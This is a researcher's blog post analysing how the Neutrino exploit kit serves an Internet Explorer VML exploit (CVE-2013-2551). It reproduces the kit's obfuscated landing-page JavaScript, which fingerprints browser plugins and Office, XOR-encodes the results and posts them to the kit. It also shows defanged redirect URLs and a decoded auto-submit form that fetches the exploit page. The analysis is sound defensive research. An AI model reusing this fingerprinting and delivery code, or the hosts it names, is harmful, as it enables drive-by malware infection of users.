Neutrino EK - IE exploit analysis

More Neutrino stuff on the menu. Hopefully you find it better than spam and are not tired of my Neutrino adventures. As I have just come back from a week off-line I spotted a tweet

Neutrino exploit kit now also serves @VUPEN 's #CVE-2013-2551 to exploit MSIE 10-9-8-7-6 via the VML integer overflow @kafeine
— Yonathan Klijnsma (@ydklijnsma) September 10, 2013

Just over a week ago I sort of concluded that Neutrion only had Java exploits. But here someone prove me wrong and I must admit I had only checked with the "obvious" stuff that neutrino uses Plugin Detect for (Or the kit just evoled just after my writing?). So time to look once again into Neutrino and one of it's mysteries.

 Get the landing

My referrer from two weeks ago was dead. The TDS was still up and working though so I had to find a valid referrer. Urlquery to the rescue. I found a Neutrino reference there which was still alive so here we go:

--2013-09-17--  hxxp: //ppbenicarlo.com/files
Resolving ppbenicarlo.com... 5.56.22.5
Connecting to ppbenicarlo.com|5.56.22.5|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: hxxp: //ppbenicarlo.com/files/ [following]
--2013-09-17 --  hxxp: //ppbenicarlo.com/files/
Connecting to ppbenicarlo.com|5.56.22.5|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: hxxp: //yojhoorbghw.is-uberleet.com:8000/horsihcmtbmf?gpnhe=3251988 [following]
--2013-09-17--  hxxp: //yojhoorbghw.is-uberleet.com:8000/horsihcmtbmf?gpnhe=3251988
Resolving yojhoorbghw.is-uberleet.com... 5.254.101.114
Connecting to yojhoorbghw.is-uberleet.com|5.254.101.114|:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `pane3'

     0K .                                                      98.7M=0s

2013-09-17 (98.7 MB/s) - `pane3' saved [1620]

Neutrino landing incoming...

<html>
<head>
 
 
 <script src="jquery.min.js"></script> 
 
 
 <script type="text/javascript" src="index.js"></script>
 
</head>
<body>
 <script type="text/javascript">
  function req(a, b, c, d, e) {
   var m = PluginDetect.getVersion,
    n = decodeURIComponent,
    p = encodeURIComponent,
    h = xor,
    g = [{
     adobe_reader: "AdobeReader"
    }, {
     java: "Java"
    }, {
     flash: "Flash"
    }, {
     quick_time: "QuickTime"
    }, {
     real_player: "RealPlayer"
    }, {
     shockwave: "Shockwave"
    }, {
     silver_light: "Silverlight"
    }, {
     vlc: "VLC"
    }, {
     wmp: "WMP"
    }],
    f = [];
   f.push("hid:::" + a);
   for (var k in g)
    for (var l in g[k]) f.push(l + ":::" + m(g[k][l]));
   f.push("office:::" + office_ver());
   a = {};
   a[d] = c;
   a[e] = p(h(f.join(";;;"), c));
   $.post(b, a, function (a, b) {
    $("body").append(h(n(a), c))
   })
  }

  function xor(a, b) {
   for (var c = "", d = O, e = O, d = O; d < a.length; d++) e = Math.floor(d % b.length), c += String.fromCharCode(a.charCodeAt(d) ^ b.charCodeAt(e));
   return c
  }

  function office_ver() {
   var a = O,
    b = O;
   try {
    a = new ActiveXObject("SharePoint.OpenDocuments.4")
   } catch (c) {}
   try {
    b = new ActiveXObject("SharePoint.OpenDocuments.3")
   } catch (d) {}
   return "object" == typeof a && "object" == typeof b ? "2O1O" : "number" == typeof a && "object" == typeof b ? "2OO7" : null
  };  


  $(document).ready(function () {
   req("52384269aaa2cc6eOa355f6b", "nwsshubk", "mxipcidv", "shjhrkhksgfqhsp", "dqxjtgnonkgfrb")
  });
 </script>
 
 
</body>
</html>

Std Neutrino stuff this...

Get the exploit URL

As we want to look into the reported IE exploit from Neutrino we want to send in nothing from the plugin detect phase:

hid:::52384269aaa2cc6e0a355f6b;;;adobe_reader:::null;;;java:::null;;;flash:::null;;;quick_time:::null;;;real_player:::null;;;shockwave:::null;;;silver_light:::null;;;vlc:::null;;;wmp:::null;;;office:::null

Post that into the server and see what we get (For details on Neutrino HTTP posts check my earlier analysis)

q%60y_%0F%0B%04X%08%13%17%0B%18P_%01%04%17%19%5EYB%01%06%1A%0B%06%0B%04%0F%1F%01%07M%17%5B%18%1A%0C%02%0F%0C%01%02C%1B%06%1
DYQTF%5DW%0C%1C%06%1D%0D%0F%09%1A%07%15%02%0ACV%04%1CTW%04%06CHQ%11%07%16%1DD%18%0C%15%0CMD%10%17%11%03%11%1FWC%1F%05%1A%18%1DTW%1
9%0B%14%17%1E%19%04W%5DUK%10%02%0A%04Nj%60m%7Cdq%60L%10%0A%16%1F%1D%0CWzj%60m%7F%09%17%0A%05%0E%0C%0A%02C%1E%06%02%0E%1A%3FQ%0A%17N-M
%1A%11%14%11%1DXJRn%7FdqU_%10%0A%16%1F%1D%0CWzj%60

As always obfuscated, lets decode:

<form action='hxxp: //yojhoorbghw.is-uberleet.com:8000/eletiydbneac' id='go'><input name='ysgniv' value='zbpasam'></form>   
   <script>
    document.forms['go'].submit();
   </script>

Sweet stuff another post is automagically performed. Lets follow and see what happens.

--2013-09-17 --  hxxp: //yojhoorbghw.is-uberleet.com:8000/eletiydbneac
Resolving yojhoorbghw.is-uberleet.com... 5.254.101.114
Connecting to yojhoorbghw.is-uberleet.com|5.254.101.114|:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `ies3'

     0K .......... ...                                          193K=0.07s

2013-09-17 (193 KB/s) - `ies3' saved [13883]

What did we get?

Lots of Javascript. Not just any Javascript. Exploit code that looks to me to be exploiting  CVE-2013-2551. Thanks to @Rapid7 for reference within metasploit. Picture showing function lea() AKA exploit()

Epilogue

So the Neutrino EK has shown that it is more potent. Lets keep our eyes open and see if more exploits will be incorporated in the near future.

Happy Neutrino EK IE exploits harvesting :)